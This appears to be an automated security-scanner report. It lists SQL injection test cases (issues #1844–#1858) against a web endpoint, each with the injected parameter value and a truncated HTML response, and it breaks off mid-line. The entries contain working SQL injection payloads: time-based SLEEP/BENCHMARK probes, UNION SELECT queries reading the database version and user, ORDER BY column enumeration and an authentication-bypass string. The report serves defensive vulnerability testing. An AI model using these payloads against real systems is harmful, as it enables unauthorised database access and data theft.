[3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1844\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1845\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*\u2026*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1846\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \")) or ((\"x\"))=((\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1847\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1848\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1849\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' UNION SELECT sum(columnname ) from \ntablename --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1850Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1851\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A'))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1852\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1853\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ')) or (('x'))=(('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1854\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1855\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1856\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1857\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '\n%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1858\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = 